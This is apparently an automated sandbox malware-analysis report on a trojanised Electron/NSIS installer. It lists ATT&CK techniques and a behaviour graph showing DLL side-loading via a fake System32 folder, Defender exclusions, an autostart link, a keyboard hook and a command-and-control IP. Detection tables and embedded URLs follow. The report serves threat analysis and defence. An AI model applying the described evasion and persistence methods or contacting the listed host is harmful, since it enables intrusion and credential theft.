Process Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts121
Masquerading		Cached Domain Credentials21
Virtualization/Sandbox Evasion		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
Virtualization/Sandbox Evasion		DCSync1
Application Window Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Access Token Manipulation		Proc Filesystem1
Remote System Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
Process Injection		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1570242 Sample: YoS6ZBCcUy.exe Startdate: 06/12/2024 Architecture: WINDOWS Score: 100 109 Suricata IDS alerts for network traffic 2->109 111 Multi AV Scanner detection for dropped file 2->111 113 Sigma detected: Powershell create lnk in startup 2->113 115 7 other signatures 2->115 10 NSIS.exe 17 2->10         started        13 YoS6ZBCcUy.exe 11 192 2->13         started        16 NSIS.exe 2->16         started        process3 file4 89 C:\Windows \System32\version.dll, PE32+ 10->89 dropped 91 C:\Users\user\AppData\Roaming\...\version.dll, PE32 10->91 dropped 103 6 other files (3 malicious) 10->103 dropped 18 cmd.exe 1 10->18         started        21 cmd.exe 10->21         started        23 cmd.exe 1 10->23         started        33 2 other processes 10->33 93 C:\Users\user\AppData\Local\...\vulkan-1.dll, PE32+ 13->93 dropped 95 C:\Users\user\AppData\...\vk_swiftshader.dll, PE32+ 13->95 dropped 97 C:\Users\user\AppData\Local\...\libGLESv2.dll, PE32+ 13->97 dropped 105 15 other files (5 malicious) 13->105 dropped 127 Drops large PE files 13->127 25 cmd.exe 1 13->25         started        99 b1dc575e-7958-4cdc...23d21682d6f.tmp.dll, PE32+ 16->99 dropped 101 aa6ee5f9-f11d-4a3b...dc4d4da48f4.tmp.dll, PE32 16->101 dropped 27 cmd.exe 16->27         started        29 cmd.exe 16->29         started        31 NSIS.exe 16->31         started        35 2 other processes 16->35 signatures5 process6 signatures7 37 powershell.exe 18->37         started        39 conhost.exe 18->39         started        41 powershell.exe 21->41         started        43 conhost.exe 21->43         started        50 2 other processes 23->50 53 3 other processes 25->53 117 Suspicious powershell command line found 27->117 45 powershell.exe 27->45         started        48 conhost.exe 27->48         started        55 2 other processes 29->55 process8 file9 57 winSAT.exe 37->57         started        60 winSAT.exe 37->60         started        62 winSAT.exe 41->62         started        64 winSAT.exe 41->64         started        129 Drops executables to the windows directory (C:\Windows) and starts them 45->129 66 winSAT.exe 45->66         started        68 winSAT.exe 45->68         started        87 C:\Users\user\AppData\...\MyElectronApp.lnk, MS 50->87 dropped 131 Powershell creates an autostart link 50->131 133 Suspicious powershell command line found 53->133 135 Bypasses PowerShell execution policy 53->135 137 Adds a directory exclusion to Windows Defender 53->137 signatures10 process11 signatures12 123 Suspicious powershell command line found 57->123 125 Adds a directory exclusion to Windows Defender 57->125 70 powershell.exe 57->70         started        73 conhost.exe 57->73         started        75 powershell.exe 62->75         started        77 conhost.exe 62->77         started        79 powershell.exe 66->79         started        81 conhost.exe 66->81         started        process13 signatures14 121 Loading BitLocker PowerShell Module 70->121 83 Bginfo.exe 75->83         started        process15 dnsIp16 107 185.42.12.39, 2404, 49754, 49760 MULTIHOST-ASRU Russian Federation 83->107 119 Installs a global keyboard hook 83->119 signatures17

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
YoS6ZBCcUy.exe17%ReversingLabsWin32.Trojan.Generic

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe0%ReversingLabs
C:\Users\user\AppData\Local\Programs\NSIS\d3dcompiler_47.dll0%ReversingLabs
C:\Users\user\AppData\Local\Programs\NSIS\ffmpeg.dll0%ReversingLabs
C:\Users\user\AppData\Local\Programs\NSIS\libEGL.dll0%ReversingLabs
C:\Users\user\AppData\Local\Programs\NSIS\libGLESv2.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\039a5ffc-3e3b-416f-b75e-1c58b05c238b.tmp.dll62%ReversingLabsWin32.Adware.RedCap
C:\Users\user\AppData\Local\Temp\234d6ba4-850d-4c80-8096-274aff2a3936.tmp.dll16%ReversingLabs
C:\Users\user\AppData\Local\Temp\55211371-e4e4-4315-9751-4ed29e5502da.tmp.dll16%ReversingLabs
C:\Users\user\AppData\Local\Temp\8e6f904c-93b6-4e7c-b442-119a15f71127.tmp.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\aa6ee5f9-f11d-4a3b-adf5-0dc4d4da48f4.tmp.dll62%ReversingLabsWin32.Adware.RedCap
C:\Users\user\AppData\Local\Temp\b1dc575e-7958-4cdc-a4c8-223d21682d6f.tmp.dll16%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\NSIS.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\d3dcompiler_47.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\ffmpeg.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\libEGL.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\libGLESv2.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\resources\elevate.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\vk_swiftshader.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\vulkan-1.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\SpiderBanner.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\StdUtils.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\System.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\nsExec.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\nsis7z.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exe0%ReversingLabs
C:\Users\user\AppData\Roaming\MyElectronApp\version.dll62%ReversingLabsWin32.Adware.RedCap
C:\Windows \System32\version.dll16%ReversingLabs
C:\Windows \System32\winSAT.exe0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://console.spec.whatwg.org/#table0%Avira URL Cloudsafe
https://url.spec.whatwg.org/#concept-urlencoded-serializer0%Avira URL Cloudsafe
https://encoding.spec.whatwg.org/#textencoder0%Avira URL Cloudsafe
http://www.midnight-commander.org/browser/lib/tty/key.c0%Avira URL Cloudsafe
https://url.spec.whatwg.org/#concept-url-origin0%Avira URL Cloudsafe
https://sizzlejs.com/0%Avira URL Cloudsafe
http://fresc81.github.io/node-winreg0%Avira URL Cloudsafe
https://heycam.github.io/webidl/#es-iterable-entries0%Avira URL Cloudsafe
https://heycam.github.io/webidl/#es-interfaces0%Avira URL Cloudsafe
https://tc39.github.io/ecma262/#sec-object.prototype.tostring0%Avira URL Cloudsafe
https://heycam.github.io/webidl/#dfn-iterator-prototype-object0%Avira URL Cloudsafe
https://html.spec.whatwg.org/multipage/timers-and-user-prompts.html#dom-setinterval0%Avira URL Cloudsafe
https://sindresorhus.com0%Avira URL Cloudsafe
https://fetch.spec.whatwg.org/#fetch-method0%Avira URL Cloudsafe
https://url.spec.whatwg.org/#urlsearchparams0%Avira URL Cloudsafe
https://tc39.es/ecma262/#sec-%typedarray%-intrinsic-object0%Avira URL Cloudsafe
https://www.ecma-international.org/ecma-262/#sec-line-terminators0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://github.com/lgeiger/node-abi/issues/54YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
    		high
    https://github.com/mcollina/reusify#readmeYoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
      		high
      https://url.spec.whatwg.org/#concept-url-originYoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      https://github.com/simplejson/simplejsonYoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpfalse
        		high
        https://tools.ietf.org/html/rfc6455#section-1.3YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
          		high
          https://github.com/prebuild/prebuild-installYoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
            		high
            https://github.com/vercel/pkg-fetch/actions/runs/2638965835YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
              		high
              https://github.com/jesec/pkg-fetch/actions/runs/2639072106YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
                		high
                https://github.com/feross/queue-microtaskYoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
                  		high
                  https://console.spec.whatwg.org/#tableYoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.com/nodejs/string_decoderYoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
                    		high
                    https://secure.travis-ci.org/troygoode/node-require-directory.png)YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
                      		high
                      https://encoding.spec.whatwg.org/#textencoderYoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.patreon.com/ferossYoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
                        		high
                        https://github.com/tc39/proposal-weakrefsYoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                          		high
                          https://goo.gl/t5IS6M).YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpfalse
                            		high
                            https://github.com/vercel/pkg-fetch/actions/runs/2638965968YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
                              		high
                              https://github.com/nodejs/node/issues/44985YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                		high
                                https://github.com/google/caja/blob/HEAD/src/com/google/caja/ses/repairES5.jsYoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                  		high
                                  https://url.spec.whatwg.org/#concept-urlencoded-serializerYoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://url.spec.whatwg.org/#dom-urlsearchparams-urlsearchparamsYoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                    		high
                                    https://yargs.js.org/YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                      		high
                                      https://semver.org/YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                        		high
                                        https://github.com/google/pprof/tree/master/protoYoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://github.com/jrmuizel/qcms/tree/v4YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://nodejs.org/api/fs.htmlYoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                              		high
                                              https://npmjs.org/package/require-directory))YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                		high
                                                https://chromium.googlesource.com/chromium/src/YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2078169826.00000000069A3000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.midnight-commander.org/browser/lib/tty/key.cYoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://nodejs.org/YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://tools.ietf.org/html/rfc7540#section-8.1.2.5YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://github.com/tensorflow/modelsYoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://github.com/KhronosGroup/SPIRV-Headers.gitYoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://tc39.es/ecma262/#sec-timeclipYoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://nodei.co/npm/require-directory/)YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://github.com/nodejs/node/pull/33661YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/endsWithYoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://github.com/tensorflow/tflite-supportYoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://github.com/WICG/scheduling-apisYoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://github.com/nodejs/node/pull/48477#issuecomment-1604586650YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://pypi.org/project/pyparsingYoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://sqlite.org/YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://code.google.com/p/v8/wiki/JavaScriptStackTraceApiYoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://code.google.com/p/chromium/issues/detail?id=25916YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://webidl.spec.whatwg.org/#abstract-opdef-converttointYoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.opensource.org/licenses/mit-license.php)YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://stackoverflow.com/a/1068308/13216YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://github.com/jesec/pkg-fetch/actions/runs/2639072371YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://twitter.com/intent/user?screen_name=troygoode)YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://fetch.spec.whatwg.org/#fetch-timing-infoYoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://html.spec.whatwg.org/multipage/server-sent-events.html#server-sent-events.org/YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://github.com/libuv/libuv/pull/1088YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://github.com/nodejs/node/pull/12607YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://tukaani.org/xz/&gt;.YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://html.spec.whatwg.org/multipage/webappapis.html#windoworworkerglobalscope.YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://www.ecma-international.org/ecma-262/#sec-line-terminatorsYoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://fresc81.github.io/node-winregYoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://www.unicode.org/Public/UNIDATA/EastAsianWidth.txtYoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://sizzlejs.com/YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://medium.com/YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.portaudio.comYoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://github.com/ChromeDevTools/devtools-frontend/blob/4275917f84266ef40613db3c1784a25f902ea74e/frYoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://www.unicode.org/copyright.htmlYoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://github.com/inspect-js/node-supports-preserve-symlinks-flag.gitYoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://github.com/vercel/pkg-fetch/actions/runs/2068735040YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://github.com/vercel/pkg-fetch/actions/runs/752615557YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://github.com/RyanZim/universalify.gitYoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://w3c.github.io/aria/#aria-hidden.YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://developer.chrome.com/docs/extensions/mv3/cross-origin-isolation/.YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://github.com/WICG/construct-stylesheets/issues/119#issuecomment-588352418.YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://github.com/google/shell-encryptionYoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://heycam.github.io/webidl/#es-iterable-entriesYoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                https://github.com/wasdk/wasmparserYoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://heycam.github.io/webidl/#es-interfacesYoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  		unknown
                                                                                                                                  https://unpkg.com/cliuiYoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://github.com/nodejs/node/issuesYoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://github.com/denoland/deno/blob/main/LICENSE.md.YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://encoding.spec.whatwg.org/#encode-and-enqueue-a-chunkYoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://tc39.github.io/ecma262/#sec-object.prototype.tostringYoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          		unknown
                                                                                                                                          https://url.spec.whatwg.org/#urlsearchparamsYoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          		unknown
                                                                                                                                          https://github.com/dpranke/typ.gitYoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://github.com/nodejs/node/issues/8987YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://github.com/vercel/pkg-fetch/actions/runs/752615423YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://streams.spec.whatwg.org/#example-manual-write-with-backpressureYoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://github.com/nodejs/node/pull/30380#issuecomment-552948364YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://html.spec.whatwg.org/multipage/timers-and-user-prompts.html#dom-setintervalYoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    		unknown
                                                                                                                                                    https://www.khronos.org/registry/YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://juliangruber.comYoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://github.com/sponsors/ferossYoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://heycam.github.io/webidl/#dfn-iterator-prototype-objectYoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          		unknown
                                                                                                                                                          https://datatracker.ietf.org/doc/html/rfc7238YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://github.com/nodejs/node/pull/38614)YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://github.com/nodejs/node/issues/10673YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://xhr.spec.whatwg.org/.YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
